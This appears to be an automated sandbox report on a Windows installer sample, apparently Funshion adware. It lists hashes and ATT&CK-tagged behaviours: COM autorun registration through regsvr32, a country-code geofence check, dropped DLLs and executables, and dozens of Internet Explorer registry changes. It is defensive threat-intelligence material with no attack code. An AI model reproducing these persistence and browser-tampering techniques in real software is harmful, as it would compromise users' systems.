4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050

Analysis

max time kernel
206s
max time network
212s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2022 11:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
Size

106KB
MD5

04dc85e18f440a5b0357e8a36eb5c281
SHA1

932d9dbe76cdc980f3ee7c5e345526f89a47af4f
SHA256

4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050
SHA512

11f8036c4fa9286d3c02c28569bc163bb60f5440dd2b87f4a57dcae6d04c92138ba417626f991e614807d0aa14f70ac44028765f0b34f502f19fa27240f6f4da
SSDEEP

3072:xZMJnTeM4cJJ+dILa77j2NZmOSyt+DDMuzWtVhUxxe:/eTeM/mILI8Z2yQ/MGWcxg

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

FunshionInstall_C105806.exe

pid process

3092 FunshionInstall_C105806.exe

Registers COM server for autorun 1 TTPs 53 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{99D54F63-1A69-41AE-AA4D-C976EB3F0713}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{79376820-07D0-11CF-A24D-0020AFD79767}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1E651CC0-B199-11D0-8212-00C04FC32C45}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B80AB0A0-7416-11D2-9EEB-006008039E37}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{944D4C00-DD52-11CE-BF0E-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC785860-B2CA-11CE-8D2B-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A3-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A5-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D8AA343-6E63-4663-BE90-6B80F66540A3}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A2-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{301056D0-6DFF-11D2-9EEB-006008039E37}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B87BEB7B-8D29-423F-AE4D-6582C10175AC}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1643E180-90F5-11CE-97D5-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{060AF76C-68DD-11D0-8FC1-00C04FD9189D}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB1-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D3588AB0-0781-11CE-B03A-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8DFB9A0-8A20-479F-B538-9387C5EEBA2B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E5B4EAA0-B2CA-11CE-8D2B-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{48025243-2D39-11CE-875D-00608CB78066}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB7-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1DA08500-9EDC-11CF-BC10-00AA00AC74F6}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06B32AEE-77DA-484B-973B-5D64F47201B0}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2D2E24CB-0CD5-458F-86EA-3E6FA22C8E64}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E4979309-7A32-495E-8A92-7B014AAD4961}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33FACFE0-A9BE-11D0-A520-00A0D10129C0}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6F26A6CD-967B-47FD-874A-7AED2C9D25A2}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51B4ABF3-748F-4E3B-A276-C828330E926A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{418AFB70-F8B8-11CE-AAC6-0020AF0B99A3}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDBD8D00-C193-11D0-BD4E-00A0C911CE86}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDA42200-BD88-11D0-BD4E-00A0C911CE86}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3ECBC41-581A-4476-B693-A63340462D8B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FEB50740-7BEF-11CE-9BD9-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB6-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8670C736-F614-427b-8ADA-BBADC587194B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4444AC9E-242E-471B-A3C7-45DCD46352BC}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{59CE6880-ACF8-11CF-B56E-0080C7C4B68A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{336475D0-942A-11CE-A870-00AA002FEAB5}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB5-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{37E92A92-D9AA-11D2-BF84-8EF2B1555AED}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB2-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB8-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{70E102B0-5556-11CE-97C0-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05589FAF-C356-11CE-BF01-00AA0055595A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{07B65360-C445-11CE-AFDE-00AA006C14F4}\InprocServer32	regsvr32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe

Loads dropped DLL 18 IoCs

Processes:

4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exeFunshionInstall_C105806.exe

pid	process
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
3092	FunshionInstall_C105806.exe

Drops file in System32 directory 2 IoCs

Processes:

FunshionInstall_C105806.exe

description	ioc	process
File created	C:\Windows\SysWOW64\funshion.ini	FunshionInstall_C105806.exe
File opened for modification	C:\Windows\SysWOW64\funshion.ini	FunshionInstall_C105806.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f00000000020000000000106600000001000020000000293126876b8d0785ed50ab0c140b45ca89128af36a77e66ac8d6998597c79e87000000000e8000000002000020000000a0773cac82b8bec5599f84cc5fba2209cf64bc860cc7c912f40c9a1c22d32de1200000003e209572e3dde5123130cad5d0847c28b96c28ffedf934274fff8baa95e199b3400000001ab597c57f7b984634722817a4ca9260463c9502d3a73ec0b050efc26edaff0b7576d101b88c6a89fb5c3eb2bb9c8c7ac2a77074b0eb997d6693044b57a6224d	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0b70e6338ffd801	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f0000000002000000000010660000000100002000000045e2fb89d573dd0d0ef4c3fae2445930996c09dd59496267f8f21e8d19e97880000000000e8000000002000020000000d40f7672b37f164a6d1ea004f34ecf182f1f28ccffbece3c15f2a029dae6524a2000000098b75168dbd085b4dd706054c1024b242d2576f8b31084d577364f59f768eb264000000088590db4ed8e8b16f7d8a7d20660b6823f81c8199b2b2dcbd918754a82efb6e31860765978d0d604b992eba50a759f6440fbe97d0701e7eb8833011d35e8384f	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "375368907"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3400000034000000ba04000099020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1614414394"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 207f5c7438ffd801	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30998328"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff680000001a000000ee0400007f020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30998328"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1629415197"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00e2a76d38ffd801	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1629415197"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4e00000000000000d404000065020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1614414394"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f000000000200000000001066000000010000200000004ef5c24b11495468c92c21e176e89ca3e276c935fd7ff4f94a41a18e19d8714d000000000e8000000002000020000000ee1c30128765fb264c11d06b93e62c7814739ef13006bac7ba4de63d68c98546200000006c7484b703731816923fecf20f518bdcf7c1ec00e94ea3d79f8908fbfb81525640000000e92927fb3e1feef41ec4366e461e235c6e479b80f5c9f4472c288c9e8a64af0c389bbff4ebc30c5be7f2faf7d737c501ed1ec2a651ce1de0c217576396c63a58	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 800783a138ffd801	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f00000000020000000000106600000001000020000000566f8b06e1695ea3ac09f8f8bf28ffa6791d7c3f109c1bccee54071d71b72c51000000000e8000000002000020000000939e480d3173b35dd4ff97ec25c524ad972e967e7ab8df04875a210fa04af53a20000000c6c139e1028114d4592ef9c06ebc1e3335b824dcb8e8559ce02ce9decd4e95dd4000000038fae1fd979cb10d53f01ce0186cb4d125cdd8d0a90a65c46002f3389d3e6ad728963c7c7c61ee4b1b4115f0b2189fd4f636706caf144f480431fe92e97be4a6	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 803d2d9938ffd801	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7069349938ffd801	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30998328"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30998328"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f00000000020000000000106600000001000020000000d86d5792d60cf7f648d596dc73120699efdd19c110fd02282c45f2419dd73560000000000e800000000200002000000088f1f299254aa63dd8229478efa46fabae1f742c77f5ea46a9eaebb4c107531c20000000af95ea82b1254fc5652af99917a80b93aac8b1e416539181a6142391315374b8400000004d787bc13c85ef9cc43b0d94a1def7702e4ab15e32c9efaf55b1bc3bb8145a0803a4e060ab13e630f65cf18af78b7b07dd5fe74f3d2af93ed96731644a6a9446	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 104b899a38ffd801	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f00000000020000000000106600000001000020000000c64b044f44eb0134e1c6a969d0aa1e4dc42fb7862946f2391b045e40b9eda4f5000000000e8000000002000020000000092c0cde7c4f3d77e4e9028d895758b0c6c8fe81752ed312db473721a722335920000000ab8f2d6103bcc28a7d3d7d4af9dadea975d2cfe2d26b77fce65a0c44bdf397d84000000043c4d7dd9bd94b87cce58332d53ef3663bdf1b075bbff39a34de758046fb43ebfcb18cd0300badf598ae3887d0201b386bcb1e6358fb49b697773def48583465	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f000000000200000000001066000000010000200000009cac2fe757fde4034866b8bc2c27734458a1a7b6b720673d2fba9d55ea282bac000000000e800000000200002000000051e5d9494600da1dff4d7fd9b0acb6262ebe9aa5c7dbce58e9cced11e14ace1220000000ded955fcbffa886f713d3cb821b225e4f96decdf577132b2e2bd1d21b91c9cb2400000005e0f0d4c59a860fb6dca9c0cff8e238898a6d4b40604743affbe2f665333a8decf68ef5c8a2ca61a7bf6a42531a80ec6fcba97ab3744fab3b1421c31d0469593	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f000000000200000000001066000000010000200000009636da5abac984b5f1a493dbbfa3fe46304578bf87d98fde8dcc3897a7aca316000000000e8000000002000020000000089d55aa45411299f78711d071482f4117ed1f692dca6ee063653f6796929dbc2000000006de72e4f332300cd601f95ee3f5c7b42f40d15f3296472360beb0c638f349e740000000862e0e46d8777a75fdc64b55db171dd6e043cb911e60d546b01bc759e6204c43e0b1a8ae8f9a53c5dae090cbc6750567dc9a58d73e7896f6119b9215df3cc2f4	IEXPLORE.EXE

Modifies registry class 64 IoCs

Processes:

regsvr32.exeregsvr32.exe

description	ioc	process
